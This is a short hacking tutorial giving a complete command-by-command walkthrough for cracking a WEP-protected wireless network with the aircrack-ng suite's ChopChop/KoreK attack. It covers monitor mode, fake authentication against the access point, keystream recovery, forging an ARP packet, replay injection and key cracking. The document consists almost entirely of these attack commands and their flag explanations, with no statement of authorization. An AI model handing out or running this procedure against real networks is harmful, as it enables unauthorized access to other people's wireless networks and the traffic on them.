
Cracking WEP with the ChopChop / KoreK attack



Advanced WEP hacking



The mighty ChopChop / Korek attack!

airmon-ng start wlan1 6

Starts monitor mode on wlan1, on channel 6. The monitor interface used in the commands below is mon0.

airodump-ng -c 6 mon0

In this case we know that the AP is using channel 6, so we listen on channel 6.

Press CTRL+C and copy the AP's BSSID.
We also need our own MAC address:

macchanger -s mon0

Copy it. You will need this MAC address several times.

aireplay-ng -1 0 -e Test -a 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb mon0

-1 = Fake authentication
0 = Reassociation timing in seconds
-e = Target network essid
-a = Access point MAC address
-h = Your card's MAC address

aireplay-ng -4 -e Test -b 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb mon0

-4 = ChopChop attack
-e = Target network essid
-h = MAC address of an associated client, or the one used for fake auth
-b = Access point MAC address

You will be asked if you want to use "this" packet. Check the Dest. MAC field.

Dest. MAC should NOT say ff:ff:ff:ff:ff:ff (this time)

When you have found the right packet, press y

[Image: wep2.jpg]

All the information is saved in 2 replay files (replay_dec-1116-190213.xor and replay_dec-1116-190213.cap). The .xor file holds the recovered keystream (PRGA) that packetforge-ng reads in the next step.

packetforge-ng -0 -a 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1116-190213.xor -w arp-request

-0 = Generate an ARP request packet
-a = Access point MAC address
-h = Source MAC address (your MAC)
-k = Destination IP
-l = Source IP
-y = Read PRGA from this file
-w = Write packet to this pcap file

Wrote packet to arp-request (file saved as arp-request)

Time to start Airodump

airodump-ng -w wifi -c 6 --bssid 00:09:5B:D9:FD:94 mon0


-w = Write to file called wifi
-c = Channel
--bssid = (MAC address of AP)

aireplay-ng -2 -r arp-request mon0

-2 = Interactive packet replay
-r = used to specify a pcap file to read packets from

You will be asked if you want to use "this" packet. Press "y"

TIME TO CRACK IT

aircrack-ng wifi-01.cap

















[Image: wep3.jpg]